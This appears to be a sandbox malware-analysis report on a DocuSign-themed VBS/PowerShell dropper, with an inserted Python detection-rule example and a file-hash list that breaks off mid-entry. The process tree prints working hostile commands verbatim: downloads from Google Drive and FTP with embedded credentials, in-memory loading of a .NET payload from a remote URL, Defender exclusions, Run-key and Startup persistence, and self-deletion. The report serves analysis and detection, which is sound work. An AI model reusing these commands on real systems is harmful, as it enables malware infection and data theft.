'wAG0AZQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HADoAOg' + [char]66 + 'dAGgAdA' + [char]66 + 'hAFAALg' + [char]66 + 'PAEkALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGoATQ' + [char]66 + 'PAHoASAAkAHsAIAApACAAeA' + [char]66 + 'DAGIAeA' + [char]66 + '2ACQAIAAoACAAZg' + [char]66 + 'pADsAIAApADIAKA' + [char]66 + 'zAGwAYQ' + [char]66 + '1AHEARQAuAHIAbw' + [char]66 + 'qAGEATQAuAG4Abw' + [char]66 + 'pAHMAcg' + [char]66 + 'lAFYALg' + [char]66 + '0AHMAbw' + [char]66 + 'oACQAIAA9ACAAeA' + [char]66 + 'DAGIAeA' + [char]66 + '2ACQAIAA7AA==';$mwxpv = $mwxpv.replace('уЦϚ' , 'B') ;;$ybsbt = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $mwxpv ) ); $ybsbt = $ybsbt[-1..-$ybsbt.Length] -join '';$ybsbt = $ybsbt.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\DocuSign01210021100.vbs');powershell $ybsbt
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5112
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $vxbCx = $host.Version.Major.Equals(2) ;if ( $vxbCx ) {$HzOMj = [System.IO.Path]::GetTempPath();del ( $HzOMj + '\Upwin.msu' );$gdmry = 'https://drive.google.com/uc?export=download&id=';$PiUQb = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $PiUQb ) {$gdmry = ($gdmry + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$gdmry = ($gdmry + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$zgghm = (New-Object Net.WebClient);$zgghm.Encoding = [System.Text.Encoding]::UTF8;$zgghm.DownloadFile($gdmry, ($HzOMj + '\Upwin.msu') );$tpWkF = ('C:\Users\' + [Environment]::UserName );HhXHB = ($HzOMj + '\Upwin.msu'); powershell.exe wusa.exe HhXHB /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\DocuSign01210021100.vbs' -Destination ( $tpWkF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit; };$fspks = ('ftp://[email protected]/Upcrypter' + '/01/DLL01.txt' );$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$OjrRP = (-join [char[]](100,101,115,99,107,118,98,114,97,116,49)) ;$lllGq = (-join [char[]](102, 89, 117, 100, 89, 49, 53, 55, 56, 64, 64, 64, 64, 64, 64 )) ;$webClient = New-Object System.Net.WebClient ;$webClient.Credentials = new-object System.Net.NetworkCredential($OjrRP, $lllGq) ;$RVUXv = $webClient.DownloadString( $fspks ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA 
) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$sNwoM = ''C:\Users\Admin\AppData\Local\Temp\DocuSign01210021100.vbs'' ; $ryaeG = (Get-Content -Path ' + $STfGl + ' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''↓:↓'',''A'') ) ;' ;$MODRg += '[System.AppDomain]::CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$MODRg += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''txt.b/moc.nucnacnegaminoc//:sptth'' , $sNwoM , ''D DDRegAsm'' ) );';$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;};"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1308
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:5008
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4900
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3348
          • C:\Windows\SYSTEM32\cmd.exe
            cmd.exe /c mkdir "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\"
            5⤵
              PID:4056
            • C:\Windows\SYSTEM32\cmd.exe
              cmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\gaduf.ps1'"
              5⤵
              • Hide Artifacts: Hidden Window
              • Suspicious use of WriteProcessMemory
              PID:2056
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\gaduf.ps1'
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:1612
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\gaduf.ps1"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2240
            • C:\Windows\SYSTEM32\cmd.exe
              cmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iimbz.ps1'"
              5⤵
              • Hide Artifacts: Hidden Window
              • Suspicious use of WriteProcessMemory
              PID:3224
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iimbz.ps1'
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:3992
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iimbz.ps1"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1104
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\cikak.ps1"
              5⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4376
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\pesister.ps1"
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:264
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\pesister.ps1
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:4292
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iimbz.ps1"
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4076
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iimbz.ps1"
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:936
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iimbz.ps1"
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3440
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iimbz.ps1"
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2340
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iimbz.ps1"
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4928
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iimbz.ps1"
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1580
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iimbz.ps1"
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1572
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iimbz.ps1"
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:868
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iimbz.ps1"
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:704
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                6⤵
                • System Location Discovery: System Language Discovery
                PID:3808
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3808 -s 624
                  7⤵
                  • Program crash
                  PID:1580
            • C:\Windows\SYSTEM32\cmd.exe
              cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\DocuSign01210021100.vbs"
              5⤵
                PID:4392
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3808 -ip 3808
        1⤵
          PID:1244
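The process tree above carries three behaviours worth turning into endpoint detections: PowerShell launched with `-ExecutionPolicy Bypass -file` against a `.ps1` under `AppData\LocalLow`, inside a directory name repeated four times; `RegAsm.exe` started with no arguments under a script host (a legitimate RegAsm call names an assembly); and `cmd.exe /c del` removing the original `.vbs` from `%TEMP%`. The Python below is an added example, not part of the sandbox report, showing how those command lines can be scored as simplified process-creation events. The event dicts use Sysmon Event ID 1 field names (`Image`, `ParentImage`, `CommandLine`) and are constructed from the command lines in the tree; the parent image for `cmd.exe` and the benign control event are assumptions, not taken from the report.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 field names).
# Command lines 1-3 are copied from the report's process tree; the ParentImage
# of cmd.exe and the fourth (benign) event are assumptions for the example.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iimbz.ps1"'},
    {"Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"'},
    {"Image": r"C:\Windows\SYSTEM32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\DocuSign01210021100.vbs"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file "C:\Scripts\inventory.ps1"'},
]

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Locations a standard user can write to; scripts here deserve more scrutiny.
USER_WRITABLE = re.compile(r"\\AppData\\(?:Local|LocalLow|Roaming)\\|\\Temp\\|\\Users\\Public\\", re.I)
DROPPER_EXT = r"\.(?:vbs|vbe|js|jse|hta|wsf|lnk|bat|cmd)"
# The same directory name three or more times in a row, as in the LocalLow path above.
REPEATED_DIR = re.compile(r'\\([^\\"]+)(?:\\\1){2,}\\')

RULES = {}

def rule(name):
    """Register a predicate under a rule name."""
    def wrap(fn):
        RULES[name] = fn
        return fn
    return wrap

def _base(path):
    return path.rsplit("\\", 1)[-1].lower()

@rule("ps_bypass_userwritable")
def _ps_bypass(ev):
    # PowerShell with the execution policy bypassed, running a script from a user-writable path.
    if _base(ev["Image"]) not in {"powershell.exe", "pwsh.exe"}:
        return False
    cl = ev["CommandLine"]
    bypass = re.search(r"-(?:ExecutionPolicy|ep|ex|exec)\s+bypass", cl, re.I)
    script = re.search(r'-f(?:ile)?\s+"?([^"]+\.ps1)', cl, re.I)
    return bool(bypass and script and USER_WRITABLE.search(script.group(1)))

@rule("regasm_no_args")
def _regasm(ev):
    # RegAsm/RegSvcs with no assembly argument, spawned by a script interpreter.
    if _base(ev["Image"]) not in {"regasm.exe", "regsvcs.exe"}:
        return False
    args = re.sub(r'^"[^"]*"|^\S+', "", ev["CommandLine"]).strip()
    return args == "" and _base(ev["ParentImage"]) in SCRIPT_HOSTS

@rule("dropper_self_delete")
def _self_delete(ev):
    # cmd.exe deleting a script-type file from a user-writable location.
    if _base(ev["Image"]) != "cmd.exe":
        return False
    m = re.search(r'/c\s+del\s+(?:/\S+\s+)*"?([^"]+?' + DROPPER_EXT + r")", ev["CommandLine"], re.I)
    return bool(m and USER_WRITABLE.search(m.group(1)))

@rule("repeated_dir_path")
def _repeated(ev):
    return bool(REPEATED_DIR.search(ev["CommandLine"]))

def evaluate(ev):
    """Return the sorted names of every rule the event matches."""
    return sorted(name for name, fn in RULES.items() if fn(ev))

def triage(events):
    """Score a batch of events: (image basename, matched rules) per event."""
    return [(_base(ev["Image"]), evaluate(ev)) for ev in events]

if __name__ == "__main__":
    for image, hits in triage(SAMPLE_EVENTS):
        print(f"{image:16} {', '.join(hits) or '-'}")
```

Each rule on its own is a lead rather than a verdict (administrators do run `-ExecutionPolicy Bypass`); the point of the example is that the three report-derived events each trip a different rule while the benign control trips none, so correlating hits under one PowerShell parent is what separates this chain from noise.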

        MITRE ATT&CK Enterprise v15

        Downloads

        • C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\cikak.ps1

          Filesize

          1.2MB

          MD5

          b90ec70bbca61d24cb7099a4c31b7244

          SHA1

          7475cae19c0940c059db9e53da2036bc37d7861d

          SHA256

          9911aa6de1fc5d08c3484edd67b7e2203ad45e966452b05cce6ca144ce224999

          SHA512

          e6ec8bc839e2ad228f91ef9e69a0937e9c8b2c25b938b36d6e7a25c149cb3f710b358dbc8b82fe7581b254e4b9e625df7baba36760fc54263221aabb46d160a3

        • C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\gaduf.ps1

          Filesize

          426B

          MD5

          d31330d8f5f6082f17f5486feff028fa

          SHA1

          5813e53aa57c3488599e742d85be3f698328659b

          SHA256

          e040152d83f083fd392807ef3904ee3911fa30f2ca0c45d14ae5b92b8461d9d7

          SHA512

          424563dedc64e9ead21dcb597fb8b769143c9a79f0ca3661cd64066f490c4a3d6b9c874f2732c12020ab5a351892695c6a5b22ce8fc01a19efcf622f8ae03366

        • C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iimbz.ps1

          Filesize

          431B

          MD5

          e5b4f8fd90bca6194aa570d3109dd605

          SHA1

          846f63421ca8e9abce41d49086585bbd157bfc13

          SHA256

          e297dadfdf1d59d8b557e872feae9858f70b39c67e7fa61f1c6a79823c22e4cb

          SHA512

          eda0dfa8ce8c2ac0a5d76892e3f5e61d57f8c4050c2cd1ee63d22748b0e01ae3a25b490dd812a802874a0f6c40d281bc85241f3baf1d1e85bbbbf0fac896cd21

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          2KB

          MD5

          d85ba6ff808d9e5444a4b369f5bc2730

          SHA1

          31aa9d96590fff6981b315e0b391b575e4c0804a

          SHA256

          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

          SHA512

          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          64B

          MD5

          5a92512a32b568c5b0884526dfa7bd5c

          SHA1

          21d18deb000651ac9d78e8d7908b04bb3dc26506

          SHA256

          47218d470ca6b739da559442b1b887201839a29b3b9c5fb4ad3595f1a3de1f2c

          SHA512

          c80bd6b43389fe2047797e18ea52e6ae4c2e08fa173a130d39bd344eeb70b75edbd33b6d3d35efdf1e5fcf84be5eaea87b21362c2e0dd6eef08af200afb11c75

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          64B

          MD5

          b11c8ba80a6e904e0615d2310256fb06

          SHA1

          995957000efced72f19f9d924cbf8e23b3d1c3ab

          SHA256

          441a732dabe0a1226640d8469d52010aedb10693b1809ec7d0ef972376d9cf22

          SHA512

          97b745ef49130d1182f788ebca5fbcbd607b11c67ff8cf5608a249182fdff298f3690efda826051b128b461bbb1046f1269db85ade371675a53852ffc3db58f1

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          d096831023867930e62e6d8b3d4d8ca6

          SHA1

          404a1e73dc1590f1c8b9327c396591567dac7365

          SHA256

          167f75b42ae614a8d6b0497779ff12f09605328533487f235b029e0db03ad23b

          SHA512

          31333100ddd8e04bf730118ea800843720c0f3fb69e27b89dda7fa4d717d25e838ad55a0919d47a44dd8a78d724ef8c105cfa230987cc46ba94a2b790ff91b75

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          948B

          MD5

          217d9191dfd67252cef23229676c9eda

          SHA1

          80d940b01c28e3933b9d68b3e567adc2bac1289f

          SHA256

          e64811c3e57476bb644539824034cabe2cabcb88941122193e2af328f5eb2133

          SHA512

          86767aa3c0eec425b7c6dbfd70a4a334fb5b1227c05fb06fbb3845e7b6974008386276f441c8e66e2bf9b0ae0a76133c4e5602211788cd702eaeadd12c5ff757

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          64B

          MD5

          50a8221b93fbd2628ac460dd408a9fc1

          SHA1

          7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

          SHA256

          46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

          SHA512

          27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          c4e53028000e62a0fe87ed7f52292e82

          SHA1

          0ba4a92b11557cf5356d9ca9beba781a2a1815c2

          SHA256

          7b49076f973e9924924ba8e970af30eb3e557d9f5f18302c42bb2ff9e955fbcf

          SHA512

          8180c5d54335ddad9d1a656b529441d7f2ec83c210f26493467fb84e8e0819e093a15fe01d39b7028f49b5b14adab0cc19f9f962e6b9a44172aa841cee29061f

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          d49246229b2077d7961ee5c90e0945f8

          SHA1

          8b50bbdbc82b00f545510bc3ea9e8cd96182fa79

          SHA256

          581ef2752ddb123bff535eebcf573a4783ada1f4b7f7250c4145902a2de5dd8c

          SHA512

          5069555ffc7a217c703186559ed399e5fd8e787443be1d6bf9b6b96faca2565fb1c898422bdde51aadd6359ebf65ae40d4509b2829c5f6bb64d597b3b4763148

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          a68fcc3482ebb381cd7eb80d4dfc7ac9

          SHA1

          68f694b1b7999996678244d8ef9d95f520ec2e39

          SHA256

          1bfbb143c70207d28f8266d08a28e052467ad0eab48c65c19ba8636d44093ea0

          SHA512

          a8a5cc66e81ebb417dcd216541690a31913f8a9cbe676b76ac451c009540ef33558dba762da1736c0f61fb36dfaa71f0926ac1ab8919a892a8ab49087999a2d8

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          012245604d1f9b30879904558e292da8

          SHA1

          e48ed6db7b52f6de8287fc5d7f6ea100326adfdc

          SHA256

          0f7c853bc431a078e6c661be3ac34d9bd0d2ac533f49eda183887122dfc02f0c

          SHA512

          78506118229cbcd2195b029912e769d1e2715471a24431a772c7a663493c9dccef8738bae29ca8ac0d227a2ace3f902fd9ec018fa5be3faa137efe19c1c51d10

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          7838adf31d802010830724fc199fd4db

          SHA1

          c8a55e5dffe362ed197ca285722742118e877f8c

          SHA256

          15aff9809598d1f49c70a220da9ab58aeedcf86d0f56f3d335f6f2c9e24de15e

          SHA512

          cd9b8112a6b94ec73f06b620544f60cac8186e3ac1e5f244eb083892acca55f0281b56399866b840e9de3f8dd32366d2539e8daf884d0bde069d8f393b9e2a23

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          471ce76847e13cf97cf882a5c41a8363

          SHA1

          79b11c6bbe9c8af88b4027267e02885061a364af

          SHA256

          5599f4a86f6ef1e750cf748809de82241ab9f65e1762f402c6b65b6de3bd1b2e

          SHA512

          c13334b4c6bd8ee0eb910f4f1473f99b882c5f658a33d8be2c7bf7fed7201553fcf56029d5871310a477ab147eb6428fef963fce5bc0722165db40cfb630aa8b

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          693baf43e3d5fefa0883380c7a77c69a

          SHA1

          f3e6115432504e8bd401d8c0ff2da43e708707e5

          SHA256

          27a3015931d1f72ce982cf8f9d38dc99219ea2bb9bda4ec7b09dca9bd1122e9e

          SHA512

          29c5e093f3f86c38246fe5f1c5d6110f315937916f139289f52dbbb1e67d4f5f46e4cc928ff03ce19b91cf1d8310d40dadc65812399829da8c94f0c6f9e3f5cc

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          944B

          MD5

          6c47b3f4e68eebd47e9332eebfd2dd4e

          SHA1
